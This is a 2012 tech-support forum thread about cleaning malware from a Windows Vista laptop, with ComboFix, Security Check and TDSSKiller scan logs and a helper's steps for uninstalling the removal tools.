[HKEY_USERS\.Default\Software\Microsoft\Windows\CurrentVersion\Explorer\FileExts\.au\UserChoice]
@Denied: (2) (LocalSystem)
"Progid"="YMP.Media"
.
[HKEY_USERS\.Default\Software\Microsoft\Windows\CurrentVersion\Explorer\FileExts\.flac\UserChoice]
@Denied: (2) (LocalSystem)
"Progid"="YMP.Media"
.
[HKEY_USERS\.Default\Software\Microsoft\Windows\CurrentVersion\Explorer\FileExts\.m3u\UserChoice]
@Denied: (2) (LocalSystem)
"Progid"="YMP.Media"
.
[HKEY_USERS\.Default\Software\Microsoft\Windows\CurrentVersion\Explorer\FileExts\.mid\UserChoice]
@Denied: (2) (LocalSystem)
"Progid"="YMP.Media"
.
[HKEY_USERS\.Default\Software\Microsoft\Windows\CurrentVersion\Explorer\FileExts\.midi\UserChoice]
@Denied: (2) (LocalSystem)
"Progid"="YMP.Media"
.
[HKEY_USERS\.Default\Software\Microsoft\Windows\CurrentVersion\Explorer\FileExts\.mp3\UserChoice]
@Denied: (2) (LocalSystem)
"Progid"="YMP.Media"
.
[HKEY_USERS\.Default\Software\Microsoft\Windows\CurrentVersion\Explorer\FileExts\.ogg\UserChoice]
@Denied: (2) (LocalSystem)
"Progid"="YMP.Media"
.
[HKEY_USERS\.Default\Software\Microsoft\Windows\CurrentVersion\Explorer\FileExts\.pcm\UserChoice]
@Denied: (2) (LocalSystem)
"Progid"="YMP.Media"
.
[HKEY_USERS\.Default\Software\Microsoft\Windows\CurrentVersion\Explorer\FileExts\.pls\UserChoice]
@Denied: (2) (LocalSystem)
"Progid"="YMP.Media"
.
[HKEY_USERS\.Default\Software\Microsoft\Windows\CurrentVersion\Explorer\FileExts\.snd\UserChoice]
@Denied: (2) (LocalSystem)
"Progid"="YMP.Media"
.
[HKEY_USERS\.Default\Software\Microsoft\Windows\CurrentVersion\Explorer\FileExts\.spx\UserChoice]
@Denied: (2) (LocalSystem)
"Progid"="YMP.Media"
.
[HKEY_USERS\.Default\Software\Microsoft\Windows\CurrentVersion\Explorer\FileExts\.wav\UserChoice]
@Denied: (2) (LocalSystem)
"Progid"="YMP.Media"
.
[HKEY_USERS\.Default\Software\Microsoft\Windows\CurrentVersion\Explorer\FileExts\.wma\UserChoice]
@Denied: (2) (LocalSystem)
"Progid"="YMP.Media"
.
[HKEY_USERS\S-1-5-21-822561583-4103383742-3251873995-1000\Software\AppDataLow]
@Denied: (Read) (RestrictedCode)
@Denied: (Read) (LocalSystem)
@Denied: (Read) (S-1-5-21-822561583-4103383742-3251873995-1000)
@Denied: (Read) (Administrators)
@SACL=(02 0001)
@Ace=(0x11) (1) (S-1-16-4096)
.
[HKEY_USERS\S-1-5-21-822561583-4103383742-3251873995-1000\Software\AppDataLow\Aurigma]
@SACL=(02 0001)
.
[HKEY_USERS\S-1-5-21-822561583-4103383742-3251873995-1000\Software\AppDataLow\Software]
@SACL=(02 0001)
.
[HKEY_USERS\S-1-5-21-822561583-4103383742-3251873995-1000\Software\AppDataLow\Software\Conduit]
@SACL=(02 0001)
.
[HKEY_USERS\S-1-5-21-822561583-4103383742-3251873995-1000\Software\AppDataLow\Software\Unity]
@SACL=(02 0001)
.
[HKEY_USERS\S-1-5-21-822561583-4103383742-3251873995-1000\Software\AppDataLow\Software\uTorrentControl]
@SACL=(02 0001)
.
[HKEY_USERS\S-1-5-21-822561583-4103383742-3251873995-1000\Software\AppDataLow\Software\Yahoo]
@SACL=(02 0001)
.
[HKEY_USERS\S-1-5-21-822561583-4103383742-3251873995-1000\Software\AppDataLow\Software\Yahoo\Companion\Profiles\!guest\bookmarks]
@SACL=(02 0001)
"lastact"=dword:00003640
.
[HKEY_USERS\S-1-5-21-822561583-4103383742-3251873995-1000\Software\AppDataLow\Software\Yahoo\Companion\Profiles\!guest\ButtonHistory]
@SACL=(02 0001)
"srch_ebox"=dword:4785b178
"srch_hlt"=dword:47854ece
"clkstrm"=dword:4785b2dc
"boo"=dword:4785b2dc
"etpg70_21"=dword:47854ece
"sst"=dword:47854ecf
"mess"=dword:4785b2dc
"mess_off"=dword:4785b2dc
"yma"=dword:47854eda
"mus"=dword:47854edb
"wik"=dword:47854edb
"vis_srch70"=dword:4785abea
"cacheldr"=dword:4785b2dc
.
[HKEY_USERS\S-1-5-21-822561583-4103383742-3251873995-1000\Software\AppDataLow\Software\Yahoo\Companion\Profiles\!guest\URLHistory]
@SACL=(02 0001)
"srch"=dword:4785abec
"vis_srch70"=dword:4785abec
.
[HKEY_USERS\S-1-5-21-822561583-4103383742-3251873995-1000\Software\AppDataLow\Software\Yahoo\Companion\Profiles\simi_zenith05]
@SACL=(02 0001)
"LastPoll_200"=dword:00041537
"resfeed"=dword:00000002
.
[HKEY_USERS\S-1-5-21-822561583-4103383742-3251873995-1000\Software\AppDataLow\Software\Yahoo\Companion\SearchHistory]
@SACL=(02 0001)
.
[HKEY_USERS\S-1-5-21-822561583-4103383742-3251873995-1000\Software\CDDB]
@Denied: (Full) (RestrictedCode)
@Denied: (Full) (LocalSystem)
@Denied: (Full) (S-1-5-21-822561583-4103383742-3251873995-1000)
.
[HKEY_USERS\S-1-5-21-822561583-4103383742-3251873995-1000\Software\ej-technologies]
@Denied: (Full) (RestrictedCode)
@Denied: (Full) (LocalSystem)
@Denied: (Full) (S-1-5-21-822561583-4103383742-3251873995-1000)
@Denied: (Full) (Administrators)
.
[HKEY_USERS\S-1-5-21-822561583-4103383742-3251873995-1000\Software\ej-technologies\exe4j]
"InstallStarted"=dword:00000000
.
[HKEY_USERS\S-1-5-21-822561583-4103383742-3251873995-1000\Software\Microsoft\Windows\CurrentVersion\Uninstall\jlGui 3.0]
@Denied: (Full) (RestrictedCode)
@Denied: (Full) (LocalSystem)
@Denied: (Full) (S-1-5-21-822561583-4103383742-3251873995-1000)
@Denied: (Full) (Administrators)
"UninstallString"="c:\\Windows\\system32\\javaws.exe -uninstall -prompt \"http://www.javazoom.com/jlgui/jws/jlgui3.0.jarjnlp\""
"DisplayName"="jlGui 3.0"
"DisplayIcon"="c:\\Users\\GAGAN\\AppData\\LocalLow\\Sun\\Java\\Deployment\\cache\\6.0\\57\\573addb9-2492e35c.ico"
"NoModify"=dword:00000001
"NoRepair"=dword:00000001
"Publisher"="Music Player for the Java(tm) Platform"
"Comments"="jlGui supports MP3, OGG VORBIS, FLAC, SPEEX, WAV, AIFF, AU audio formats. It ..."
"URLInfoAbout"="http://www.javazoom.net"
.
[HKEY_USERS\S-1-5-21-822561583-4103383742-3251873995-1000\Software\Microsoft\Windows\CurrentVersion\Webcheck\Store.1]
@Denied: (Full) (LocalSystem)
@Denied: (Full) (S-1-5-21-822561583-4103383742-3251873995-1000)
@Denied: (Full) (Administrators)
.
[HKEY_USERS\S-1-5-21-822561583-4103383742-3251873995-1000\System\12a9d3cc-cd48-4c6b-a102-8b76a6f66e5a]
@Denied: (Full) (RestrictedCode)
@Denied: (Full) (LocalSystem)
@Denied: (Full) (S-1-5-21-822561583-4103383742-3251873995-1000)
@Denied: (Full) (Administrators)
"bgu0fw0tDZx8jtqEjccbDg==
"=hex:45,75,92,1a,9f,09,c9,e9,d6,46,18,dd,5c,30,38,
96
.
[HKEY_LOCAL_MACHINE\software\Classes\.hta]
@Denied: (Full) (Administrators)
@Denied: (Full) (Owner)
@Denied: (Full) (LocalSystem)
@Denied: (Full) (Administrators)
@Denied: (Full) (Users)
@SACL=
"PerceivedType"="text"
@="htafile"
"Content Type"="application/hta"
.
[HKEY_LOCAL_MACHINE\software\Classes\.hta\PersistentHandler]
@="{eec97550-47a9-11cf-b952-00aa0051fe20}"
.
[HKEY_LOCAL_MACHINE\system\ControlSet001\Control\Class\{4D36E96D-E325-11CE-BFC1-08002BE10318}\0000\AllUserSettings]
@Denied: (A) (Users)
@Denied: (A) (Everyone)
@Allowed: (B 1 2 3 4 5) (S-1-5-20)
"BlindDial"=dword:00000000
"MSCurrentCountry"=dword:000000b5
.
------------------------ Other Running Processes ------------------------
.
c:\program files\Microsoft Security Client\MsMpEng.exe
c:\windows\system32\Ati2evxx.exe
c:\windows\system32\Ati2evxx.exe
c:\windows\system32\agrsmsvc.exe
c:\program files\Common Files\Apple\Mobile Device Support\AppleMobileDeviceService.exe
c:\program files\Bonjour\mDNSResponder.exe
c:\windows\system32\spool\DRIVERS\W32X86\3\dldtserv.exe
c:\windows\system32\dldtcoms.exe
c:\program files\Giraffic\Veoh_GirafficWatchdog.exe
c:\progra~1\mcafee\SITEAD~1\mcsacore.exe
c:\program files\Common Files\Microsoft Shared\VS7Debug\mdm.exe
c:\toshiba\IVP\ISM\pinger.exe
c:\windows\System32\tcpsvcs.exe
c:\windows\system32\rundll32.exe
c:\program files\Alcohol Soft\Alcohol 52\StarWind\StarWindServiceAE.exe
c:\toshiba\IVP\swupdate\swupdtmr.exe
c:\program files\TeamViewer\Version6\TeamViewer_Service.exe
c:\program files\Toshiba\TOSHIBA DVD PLAYER\TNaviSrv.exe
c:\windows\system32\TODDSrv.exe
c:\program files\Toshiba\Power Saver\TosCoSrv.exe
c:\program files\Common Files\Ulead Systems\DVD\ULCDRSvr.exe
c:\program files\Common Files\Microsoft Shared\Windows Live\WLIDSVC.EXE
c:\program files\Common Files\Microsoft Shared\Windows Live\WLIDSvcM.exe
c:\program files\Giraffic\Veoh_Giraffic.exe
c:\program files\TeamViewer\Version6\TeamViewer.exe
c:\windows\RtHDVCpl.exe
c:\program files\Dell V305\dldtMsdMon.exe
c:\program files\Synaptics\SynTP\SynToshiba.exe
c:\program files\ATI Technologies\ATI.ACE\Core-Static\MOM.EXE
c:\program files\iPod\bin\iPodService.exe
c:\program files\Camera Assistant Software for Toshiba\CEC_MAIN.exe
c:\program files\Synaptics\SynTP\SynTPHelper.exe
c:\program files\ATI Technologies\ATI.ACE\Core-Static\CCC.exe
c:\program files\Microsoft Security Client\MpCmdRun.exe
c:\program files\Microsoft Security Client\MpCmdRun.exe
c:\windows\servicing\TrustedInstaller.exe
.
**************************************************************************
.
Completion time: 2012-06-09 02:09:06 - machine was rebooted
ComboFix-quarantined-files.txt 2012-06-09 06:06
ComboFix2.txt 2012-05-30 04:16
ComboFix3.txt 2012-05-29 18:01
ComboFix4.txt 2012-05-29 02:55
.
Pre-Run: 46,873,288,704 bytes free
Post-Run: 46,246,096,896 bytes free
.
- - End Of File - - 64CCD60A89442B21471969895B93140D


----------



## gagraptor (May 23, 2012)

Results of screen317's Security Check version 0.99.41 
Windows Vista Service Pack 2 x86 (UAC is enabled) 
Internet Explorer 8 *Out of date!* 
*``````````````Antivirus/Firewall Check:``````````````* 
Windows Firewall Enabled! 
Microsoft Security Essentials 
(On Access scanning *disabled*!) 
*`````````Anti-malware/Other Utilities Check:`````````* 
McAfee SiteAdvisor 
Malwarebytes Anti-Malware version 1.61.0.1400 
TuneUp Companion 2.2.7 
CCleaner 
JavaFX 2.0.3 
JavaFX 2.0.2 SDK 
Java(TM) 6 Update 29 
Java(TM) 7 Update 3 
Java(TM) SE Runtime Environment 6 
Java(TM) SE Development Kit 7 Update 2 
*Java version out of date!* 
Adobe Flash Player 11.2.202.235 
Adobe Reader 8 *Adobe Reader out of date!* 
Mozilla Firefox 11.0 *Firefox out of Date!* 
Google Chrome 19.0.1084.46 
Google Chrome 19.0.1084.52 
*````````Process Check: objlist.exe by Laurent````````* 
Microsoft Security Essentials MSMpEng.exe 
Microsoft Security Essentials msseces.exe 
*`````````````````System Health check`````````````````* 
Total Fragmentation on Drive C: 0 % 
*````````````````````End of Log``````````````````````*


----------



## gagraptor (May 23, 2012)

The highest usage for memory is windows explorer13692K
and desktop window manager 13988k
I have a 2 GB ram


----------



## gagraptor (May 23, 2012)

the next highest process is around 6000k something


----------



## Mark1956 (May 7, 2011)

With only 2GB of RAM I would say your memory usage is about normal and nothing to be concerned with.

We have some updating to do but please first proceed with these instructions then post back and confirm it all went ok. I will be out for the rest of today so may not get back here until tomorrow morning, GMT+1.

Did you do the re-run with TDSSKiller, you have not posted the log.

Your system is now clean, as long as you have no further problems there are just a couple of things to do and we are finished.

To re-enable your CD Emulation drivers if you disabled them, double click *DeFogger.exe* to run the tool again.

The application window will appear.
Click the *Re-enable* button to re-enable your CD Emulation drivers.
Click *Yes* to continue.
A *'Finished!*' message will appear.
Click *OK*.
DeFogger will now ask to reboot the machine...click *OK*.
To uninstall ComboFix, press the *WINKEY + R* keys on your keyboard or click on Start







, type *Run* into the search box and hit *Enter*.
In the *Run* box type: *ComboFix /Uninstall* (Be sure to leave a space before the forward slash).










Click on *OK*.
If you encounter any problems using the switch from the Run dialog box, just rename ComboFix.exe to *Uninstall.exe*, then double-click on it to remove.
This will delete ComboFix's related folders/files, reset the clock settings, hide file extensions/system files, clear the System Restore cache to prevent possible reinfection and *create a new Restore point.*
When it has finished you will see a dialog box stating that _"ComboFix has been uninstalled". _
After that, you can delete the ComboFix.exe program from your computer (Desktop).
*Next*

Download *OTC* by OldTimer and save it to your *desktop.*
Double click







icon to start the program. 
If you are using Vista or Windows 7, please right-click and choose *Run as Administrator*
Then Click the big







button.
You will get a prompt saying "_Begin Cleanup Process_". Please select *Yes*.
Restart your computer when prompted.
-- Doing this will *remove* any specialized tools downloaded and used. If OTC does not delete itself, then delete the file manually when done.
-- Any leftover folders/files related to ComboFix or other tools which OTC did not remove can be deleted manually (right-click on it and choose delete).
Please post back when this is complete and let me know if you have had any problems.


----------



## gagraptor (May 23, 2012)

13:26:25.0188 5568	TDSS rootkit removing tool 2.7.36.0 May 21 2012 16:40:16
13:26:25.0469 5568	============================================================
13:26:25.0469 5568	Current date / time: 2012/06/09 13:26:25.0469
13:26:25.0469 5568	SystemInfo:
13:26:25.0469 5568	
13:26:25.0469 5568	OS Version: 6.0.6002 ServicePack: 2.0
13:26:25.0469 5568	Product type: Workstation
13:26:25.0469 5568	ComputerName: GAGAN-PC
13:26:25.0469 5568	UserName: GAGAN
13:26:25.0469 5568	Windows directory: C:\Windows
13:26:25.0469 5568	System windows directory: C:\Windows
13:26:25.0469 5568	Processor architecture: Intel x86
13:26:25.0469 5568	Number of processors: 2
13:26:25.0469 5568	Page size: 0x1000
13:26:25.0469 5568	Boot type: Normal boot
13:26:25.0469 5568	============================================================
13:26:29.0213 5568	Drive \Device\Harddisk0\DR0 - Size: 0x3A38B2E000 (232.89 Gb), SectorSize: 0x200, Cylinders: 0x76C1, SectorsPerTrack: 0x3F, TracksPerCylinder: 0xFF, Type 'K0', Flags 0x00000050
13:26:29.0213 5568	============================================================
13:26:29.0213 5568	\Device\Harddisk0\DR0:
13:26:29.0213 5568	MBR partitions:
13:26:29.0213 5568	\Device\Harddisk0\DR0\Partition0: MBR, Type 0x7, StartLBA 0x2EE800, BlocksNum 0x1CED7000
13:26:29.0213 5568	============================================================
13:26:29.0259 5568	C: <-> \Device\Harddisk0\DR0\Partition0
13:26:29.0259 5568	============================================================
13:26:29.0259 5568	Initialize success
13:26:29.0259 5568	============================================================
13:26:32.0005 5964	============================================================
13:26:32.0005 5964	Scan started
13:26:32.0005 5964	Mode: Manual; 
13:26:32.0005 5964	============================================================
13:26:34.0673 5964	ACPI (82b296ae1892fe3dbee00c9cf92f8ac7) C:\Windows\system32\drivers\acpi.sys
13:26:34.0673 5964	ACPI - ok
13:26:35.0250 5964	AdobeFlashPlayerUpdateSvc (76d5a3d2a50402a0b9b6ed13c4371e79) C:\Windows\system32\Macromed\Flash\FlashPlayerUpdateService.exe
13:26:35.0250 5964	AdobeFlashPlayerUpdateSvc - ok
13:26:35.0343 5964	adp94xx (2edc5bbac6c651ece337bde8ed97c9fb) C:\Windows\system32\drivers\adp94xx.sys
13:26:35.0375 5964	adp94xx - ok
13:26:35.0421 5964	adpahci (b84088ca3cdca97da44a984c6ce1ccad) C:\Windows\system32\drivers\adpahci.sys
13:26:35.0437 5964	adpahci - ok
13:26:35.0468 5964	adpu160m (7880c67bccc27c86fd05aa2afb5ea469) C:\Windows\system32\drivers\adpu160m.sys
13:26:35.0468 5964	adpu160m - ok
13:26:35.0499 5964	adpu320 (9ae713f8e30efc2abccd84904333df4d) C:\Windows\system32\drivers\adpu320.sys
13:26:35.0499 5964	adpu320 - ok
13:26:35.0562 5964	AeLookupSvc (9d1fda9e086ba64e3c93c9de32461bcf) C:\Windows\System32\aelupsvc.dll
13:26:35.0562 5964	AeLookupSvc - ok
13:26:35.0687 5964	AFD (3911b972b55fea0478476b2e777b29fa) C:\Windows\system32\drivers\afd.sys
13:26:35.0702 5964	AFD - ok
13:26:35.0718 5964	AgereModemAudio (39e435c90c9c4f780fa0ed05ca3c3a1b) C:\Windows\system32\agrsmsvc.exe
13:26:35.0718 5964	AgereModemAudio - ok
13:26:36.0404 5964	AgereSoftModem (ce91b158fa490cf4c4d487a4130f4660) C:\Windows\system32\DRIVERS\AGRSM.sys
13:26:36.0451 5964	AgereSoftModem - ok
13:26:36.0513 5964	agp440 (ef23439cdd587f64c2c1b8825cead7d8) C:\Windows\system32\drivers\agp440.sys
13:26:36.0513 5964	agp440 - ok
13:26:36.0576 5964	aic78xx (ae1fdf7bf7bb6c6a70f67699d880592a) C:\Windows\system32\drivers\djsvs.sys
13:26:36.0591 5964	aic78xx - ok
13:26:36.0638 5964	ALG (a1545b731579895d8cc44fc0481c1192) C:\Windows\System32\alg.exe
13:26:36.0638 5964	ALG - ok
13:26:36.0669 5964	aliide (90395b64600ebb4552e26e178c94b2e4) C:\Windows\system32\drivers\aliide.sys
13:26:36.0669 5964	aliide - ok
13:26:36.0685 5964	amdagp (2b13e304c9dfdfa5eb582f6a149fa2c7) C:\Windows\system32\drivers\amdagp.sys
13:26:36.0685 5964	amdagp - ok
13:26:36.0716 5964	amdide (0577df1d323fe75a739c787893d300ea) C:\Windows\system32\drivers\amdide.sys
13:26:36.0716 5964	amdide - ok
13:26:36.0732 5964	AmdK7 (dc487885bcef9f28eece6fac0e5ddfc5) C:\Windows\system32\drivers\amdk7.sys
13:26:36.0747 5964	AmdK7 - ok
13:26:36.0794 5964	AmdK8 (93ae7f7dd54ab986a6f1a1b37be7442d) C:\Windows\system32\DRIVERS\amdk8.sys
13:26:36.0794 5964	AmdK8 - ok
13:26:36.0857 5964	ApfiltrService (7c2f57bce81fa74933f0e1c84a97c9db) C:\Windows\system32\DRIVERS\Apfiltr.sys
13:26:36.0857 5964	ApfiltrService - ok
13:26:37.0075 5964	AppHostSvc (dfae18c675d71fd06d57dc69d2913975) C:\Windows\system32\inetsrv\apphostsvc.dll
13:26:37.0106 5964	AppHostSvc - ok
13:26:37.0215 5964	Appinfo (c6d704c7f0434dc791aac37cac4b6e14) C:\Windows\System32\appinfo.dll
13:26:37.0215 5964	Appinfo - ok
13:26:37.0387 5964	Apple Mobile Device (7ef47644b74ebe721cc32211d3c35e76) C:\Program Files\Common Files\Apple\Mobile Device Support\AppleMobileDeviceService.exe
13:26:37.0387 5964	Apple Mobile Device - ok
13:26:37.0465 5964	arc (5f673180268bb1fdb69c99b6619fe379) C:\Windows\system32\drivers\arc.sys
13:26:37.0496 5964	arc - ok
13:26:37.0527 5964	arcsas (957f7540b5e7f602e44648c7de5a1c05) C:\Windows\system32\drivers\arcsas.sys
13:26:37.0527 5964	arcsas - ok
13:26:37.0761 5964	AsyncMac (53b202abee6455406254444303e87be1) C:\Windows\system32\DRIVERS\asyncmac.sys
13:26:37.0761 5964	AsyncMac - ok
13:26:37.0839 5964	atapi (1f05b78ab91c9075565a9d8a4b880bc4) C:\Windows\system32\drivers\atapi.sys
13:26:37.0839 5964	atapi - ok
13:26:37.0964 5964	athr (8be56f8300e1c37b578da23c71816b7a) C:\Windows\system32\DRIVERS\athr.sys
13:26:37.0995 5964	athr - ok
13:26:38.0167 5964	Ati External Event Utility (59991b5ec50e106634a16444594c305e) C:\Windows\system32\Ati2evxx.exe
13:26:38.0198 5964	Ati External Event Utility - ok
13:26:38.0807 5964	atikmdag (fab37c8e4b55235de9055026561dcc7f) C:\Windows\system32\DRIVERS\atikmdag.sys
13:26:38.0822 5964	atikmdag - ok
13:26:39.0415 5964	AudioEndpointBuilder (68e2a1a0407a66cf50da0300852424ab) C:\Windows\System32\Audiosrv.dll
13:26:39.0431 5964	AudioEndpointBuilder - ok
13:26:39.0446 5964	Audiosrv (68e2a1a0407a66cf50da0300852424ab) C:\Windows\System32\Audiosrv.dll
13:26:39.0446 5964	Audiosrv - ok
13:26:39.0852 5964	axsaki - ok
13:26:39.0945 5964	Beep (67e506b75bd5326a3ec7b70bd014dfb6) C:\Windows\system32\drivers\Beep.sys
13:26:39.0945 5964	Beep - ok
13:26:40.0257 5964	BFE (c789af0f724fda5852fb9a7d3a432381) C:\Windows\System32\bfe.dll
13:26:40.0273 5964	BFE - ok
13:26:40.0445 5964	BITS (93952506c6d67330367f7e7934b6a02f) C:\Windows\system32\qmgr.dll
13:26:40.0476 5964	BITS - ok
13:26:40.0476 5964	blbdrive - ok
13:26:40.0788 5964	Bonjour Service (db5bea73edaf19ac68b2c0fad0f92b1a) C:\Program Files\Bonjour\mDNSResponder.exe
13:26:40.0803 5964	Bonjour Service - ok
13:26:40.0913 5964	bowser (35f376253f687bde63976ccb3f2108ca) C:\Windows\system32\DRIVERS\bowser.sys
13:26:40.0928 5964	bowser - ok
13:26:40.0959 5964	BrFiltLo (9f9acc7f7ccde8a15c282d3f88b43309) C:\Windows\system32\drivers\brfiltlo.sys
13:26:40.0959 5964	BrFiltLo - ok
13:26:40.0991 5964	BrFiltUp (56801ad62213a41f6497f96dee83755a) C:\Windows\system32\drivers\brfiltup.sys
13:26:40.0991 5964	BrFiltUp - ok
13:26:41.0022 5964	Browser (a3629a0c4226f9e9c72faaeebc3ad33c) C:\Windows\System32\browser.dll
13:26:41.0037 5964	Browser - ok
13:26:41.0069 5964	Brserid (b304e75cff293029eddf094246747113) C:\Windows\system32\drivers\brserid.sys
13:26:41.0069 5964	Brserid - ok
13:26:41.0084 5964	BrSerWdm (203f0b1e73adadbbb7b7b1fabd901f6b) C:\Windows\system32\drivers\brserwdm.sys
13:26:41.0084 5964	BrSerWdm - ok
13:26:41.0115 5964	BrUsbMdm (bd456606156ba17e60a04e18016ae54b) C:\Windows\system32\drivers\brusbmdm.sys
13:26:41.0115 5964	BrUsbMdm - ok
13:26:41.0131 5964	BrUsbSer (af72ed54503f717a43268b3cc5faec2e) C:\Windows\system32\drivers\brusbser.sys
13:26:41.0131 5964	BrUsbSer - ok
13:26:41.0147 5964	BTHMODEM (ad07c1ec6665b8b35741ab91200c6b68) C:\Windows\system32\drivers\bthmodem.sys
13:26:41.0147 5964	BTHMODEM - ok
13:26:41.0225 5964	BVRPMPR5 (248dfa5762dde38dfddbbd44149e9d7a) C:\Windows\system32\drivers\BVRPMPR5.SYS
13:26:41.0225 5964	BVRPMPR5 - ok
13:26:41.0256 5964	catchme - ok
13:26:41.0412 5964	cdfs (7add03e75beb9e6dd102c3081d29840a) C:\Windows\system32\DRIVERS\cdfs.sys
13:26:41.0427 5964	cdfs - ok
13:26:41.0615 5964	cdrom (6b4bffb9becd728097024276430db314) C:\Windows\system32\DRIVERS\cdrom.sys
13:26:41.0630 5964	cdrom - ok
13:26:41.0739 5964	CertPropSvc (312ec3e37a0a1f2006534913e37b4423) C:\Windows\System32\certprop.dll
13:26:41.0739 5964	CertPropSvc - ok
13:26:41.0786 5964	circlass (da8e0afc7baa226c538ef53ac2f90897) C:\Windows\system32\drivers\circlass.sys
13:26:41.0786 5964	circlass - ok
13:26:41.0849 5964	CLFS (d7659d3b5b92c31e84e53c1431f35132) C:\Windows\system32\CLFS.sys
13:26:41.0864 5964	CLFS - ok
13:26:42.0348 5964	clr_optimization_v2.0.50727_32 (8ee772032e2fe80a924f3b8dd5082194) C:\Windows\Microsoft.NET\Framework\v2.0.50727\mscorsvw.exe
13:26:42.0363 5964	clr_optimization_v2.0.50727_32 - ok
13:26:42.0519 5964	clr_optimization_v4.0.30319_32 (c5a75eb48e2344abdc162bda79e16841) C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvw.exe
13:26:42.0535 5964	clr_optimization_v4.0.30319_32 - ok
13:26:42.0613 5964	CmBatt (99afc3795b58cc478fbbbcdc658fcb56) C:\Windows\system32\DRIVERS\CmBatt.sys
13:26:42.0644 5964	CmBatt - ok
13:26:42.0660 5964	cmdide (45201046c776ffdaf3fc8a0029c581c8) C:\Windows\system32\drivers\cmdide.sys
13:26:42.0660 5964	cmdide - ok
13:26:42.0722 5964	Compbatt (6afef0b60fa25de07c0968983ee4f60a) C:\Windows\system32\DRIVERS\compbatt.sys
13:26:42.0722 5964	Compbatt - ok
13:26:42.0738 5964	COMSysApp - ok
13:26:42.0769 5964	crcdisk (2a213ae086bbec5e937553c7d9a2b22c) C:\Windows\system32\drivers\crcdisk.sys
13:26:42.0769 5964	crcdisk - ok
13:26:42.0785 5964	Crusoe (22a7f883508176489f559ee745b5bf5d) C:\Windows\system32\drivers\crusoe.sys
13:26:42.0800 5964	Crusoe - ok
13:26:42.0878 5964	CryptSvc (fb27772beaf8e1d28ccd825c09da939b) C:\Windows\system32\cryptsvc.dll
13:26:42.0878 5964	CryptSvc - ok
13:26:43.0487 5964	DcomLaunch (3b5b4d53fec14f7476ca29a20cc31ac9) C:\Windows\system32\rpcss.dll
13:26:43.0533 5964	DcomLaunch - ok
13:26:43.0596 5964	DfsC (622c41a07ca7e6dd91770f50d532cb6c) C:\Windows\system32\Drivers\dfsc.sys
13:26:43.0596 5964	DfsC - ok
13:26:44.0516 5964	DFSR (2cc3dcfb533a1035b13dcab6160ab38b) C:\Windows\system32\DFSR.exe
13:26:44.0641 5964	DFSR - ok
13:26:45.0405 5964	Dhcp (9028559c132146fb75eb7acf384b086a) C:\Windows\System32\dhcpcsvc.dll
13:26:45.0405 5964	Dhcp - ok
13:26:45.0515 5964	disk (5d4aefc3386920236a548271f8f1af6a) C:\Windows\system32\drivers\disk.sys
13:26:45.0530 5964	disk - ok
13:26:45.0936 5964	dldtCATSCustConnectService (31b7596edd9505fcbb07670fb69cbb48) C:\Windows\system32\spool\DRIVERS\W32X86\3\\dldtserv.exe
13:26:45.0936 5964	dldtCATSCustConnectService - ok
13:26:45.0983 5964	dldt_device - ok
13:26:46.0029 5964	Dnscache (57d762f6f5974af0da2be88a3349baaa) C:\Windows\System32\dnsrslvr.dll
13:26:46.0045 5964	Dnscache - ok
13:26:46.0544 5964	dot3svc (324fd74686b1ef5e7c19a8af49e748f6) C:\Windows\System32\dot3svc.dll
13:26:46.0544 5964	dot3svc - ok
13:26:46.0716 5964	DPS (a622e888f8aa2f6b49e9bc466f0e5def) C:\Windows\system32\dps.dll
13:26:46.0716 5964	DPS - ok
13:26:46.0778 5964	drmkaud (97fef831ab90bee128c9af390e243f80) C:\Windows\system32\drivers\drmkaud.sys
13:26:46.0794 5964	drmkaud - ok
13:26:46.0856 5964	DXGKrnl (c68ac676b0ef30cfbb1080adce49eb1f) C:\Windows\System32\drivers\dxgkrnl.sys
13:26:46.0872 5964	DXGKrnl - ok
13:26:46.0919 5964	E1G60 (f88fb26547fd2ce6d0a5af2985892c48) C:\Windows\system32\DRIVERS\E1G60I32.sys
13:26:46.0934 5964	E1G60 - ok
13:26:47.0277 5964	EapHost (c0b95e40d85cd807d614e264248a45b9) C:\Windows\System32\eapsvc.dll
13:26:47.0293 5964	EapHost - ok
13:26:47.0511 5964	Ecache (7f64ea048dcfac7acf8b4d7b4e6fe371) C:\Windows\system32\drivers\ecache.sys
13:26:47.0527 5964	Ecache - ok
13:26:47.0901 5964	ehRecvr (9be3744d295a7701eb425332014f0797) C:\Windows\ehome\ehRecvr.exe
13:26:48.0026 5964	ehRecvr - ok
13:26:48.0447 5964	ehSched (ad1870c8e5d6dd340c829e6074bf3c3f) C:\Windows\ehome\ehsched.exe
13:26:48.0494 5964	ehSched - ok
13:26:48.0572 5964	ehstart (c27c4ee8926e74aa72efcab24c5242c3) C:\Windows\ehome\ehstart.dll
13:26:48.0572 5964	ehstart - ok
13:26:48.0619 5964	ElbyCDIO (aaa8999a169e39fb8b48ae49cd6ac30a) C:\Windows\system32\Drivers\ElbyCDIO.sys
13:26:48.0619 5964	ElbyCDIO - ok
13:26:48.0650 5964	ElbyDelay (e205c313417da6fa7afe85912a310a65) C:\Windows\system32\Drivers\ElbyDelay.sys
13:26:48.0650 5964	ElbyDelay - ok
13:26:48.0713 5964	elxstor (e8f3f21a71720c84bcf423b80028359f) C:\Windows\system32\drivers\elxstor.sys
13:26:48.0759 5964	elxstor - ok
13:26:49.0305 5964	EMDMgmt (4e6b23dfc917ea39306b529b773950f4) C:\Windows\system32\emdmgmt.dll
13:26:49.0352 5964	EMDMgmt - ok
13:26:49.0586 5964	EventSystem (67058c46504bc12d821f38cf99b7b28f) C:\Windows\system32\es.dll
13:26:49.0586 5964	EventSystem - ok
13:26:49.0680 5964	exfat (22b408651f9123527bcee54b4f6c5cae) C:\Windows\system32\drivers\exfat.sys
13:26:49.0680 5964	exfat - ok
13:26:49.0945 5964	fastfat (1e9b9a70d332103c52995e957dc09ef8) C:\Windows\system32\drivers\fastfat.sys
13:26:49.0945 5964	fastfat - ok
13:26:49.0992 5964	fdc (63bdada84951b9c03e641800e176898a) C:\Windows\system32\DRIVERS\fdc.sys
13:26:49.0992 5964	fdc - ok
13:26:50.0023 5964	fdPHost (6629b5f0e98151f4afdd87567ea32ba3) C:\Windows\system32\fdPHost.dll
13:26:50.0023 5964	fdPHost - ok
13:26:50.0070 5964	FDResPub (89ed56dce8e47af40892778a5bd31fd2) C:\Windows\system32\fdrespub.dll
13:26:50.0070 5964	FDResPub - ok
13:26:50.0117 5964	FileInfo (a8c0139a884861e3aae9cfe73b208a9f) C:\Windows\system32\drivers\fileinfo.sys
13:26:50.0117 5964	FileInfo - ok
